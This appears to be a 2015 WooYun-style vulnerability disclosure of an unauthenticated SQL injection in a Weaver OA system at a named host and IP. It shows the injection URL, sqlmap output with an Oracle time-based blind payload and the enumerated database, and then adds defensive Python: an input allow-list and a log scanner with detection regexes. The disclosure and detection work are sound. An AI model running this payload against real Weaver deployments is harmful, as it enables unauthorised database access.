2015-07-31: Details reported to the vendor, awaiting the vendor's response. 2015-08-05: The vendor chose to ignore the vulnerability; details disclosed to the public.
SQL injection
Visiting http://oa.trip8080.com/ redirects to http://221.6.35.202:8009/
Viewing the page source shows the application is a Weaver (泛微) system. Following the technique in WooYun: 泛微某系统通用型SQL注入(无需登录) (a generic, unauthenticated SQL injection in a Weaver product), the injection point is constructed as:
http://221.6.35.202:8009/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[00:13:46] [INFO] resuming back-end DBMS 'oracle'
[00:13:46] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://221.6.35.202:8009/weaver/weaver.email.FileDownloadLocation?fileid=32 AND 7468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(87)||CHR(104)||CHR(118),5)&download=1
---
available databases [1]:
[*] TTS
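As an added example (not part of the original report and not the Weaver product's own code), the Python below shows the defender's side of this finding: the allow-list check the download handler should apply to fileid before it reaches the database, and a scan of access-log lines for the Oracle time-based blind markers seen in the sqlmap payload above. The log lines and client IPs are constructed, and the marker names other than DBMS_PIPE.RECEIVE_MESSAGE are assumed common siblings rather than anything from the report.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Oracle time-based blind markers: the first is the function used in the
# sqlmap payload from the report; the others are assumed common siblings.
TIME_BLIND_RE = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP|\bCHR\(\d+\)\s*\|\|",
    re.IGNORECASE,
)
ENDPOINT = "/weaver/weaver.email.FileDownloadLocation"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def fileid_is_valid(value: str) -> bool:
    """Allow-list check: a download id is a plain positive integer, nothing else."""
    return value.isdigit() and 0 < int(value) < 10**9

def classify_request(log_line: str) -> str:
    """Return 'ok', 'other', 'malformed-fileid' or 'time-based-blind-sqli'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return "other"
    target = urlsplit(m.group(1))
    if target.path != ENDPOINT:
        return "other"
    # parse_qsl percent-decodes values and splits each pair on its first '='
    params = dict(parse_qsl(target.query, keep_blank_values=True))
    fileid = params.get("fileid", "")
    if fileid_is_valid(fileid):
        return "ok"
    if TIME_BLIND_RE.search(fileid):
        return "time-based-blind-sqli"
    return "malformed-fileid"

def scan_log(lines):
    """Count verdicts over a batch of access-log lines."""
    return Counter(classify_request(line) for line in lines)

# Constructed sample lines (client IPs from the 192.0.2.0/24 documentation range).
LOG_LINES = [
    '192.0.2.10 - - [31/Jul/2015:00:13:40 +0800] "GET /weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 HTTP/1.1" 200 4096',
    '192.0.2.11 - - [31/Jul/2015:00:13:46 +0800] "GET /weaver/weaver.email.FileDownloadLocation?fileid=32%20AND%207468%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(87)||CHR(104)||CHR(118),5)&download=1 HTTP/1.1" 200 4096',
    '192.0.2.11 - - [31/Jul/2015:00:13:47 +0800] "GET /weaver/weaver.email.FileDownloadLocation?fileid=32%27&download=1 HTTP/1.1" 500 512',
    '192.0.2.12 - - [31/Jul/2015:00:14:00 +0800] "GET /favicon.ico HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in LOG_LINES:
        print(classify_request(line), "<-", line.split('"')[1])
```

Only the non-numeric verdicts need alerting; the same `fileid_is_valid` check in the handler, combined with a bound parameter in the query, is the fix on the application side.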
Severity: No impact (vendor ignored)
Ignored at: 2015-08-05 10:50
Vulnerability Rank: 4 (WooYun rating)
None yet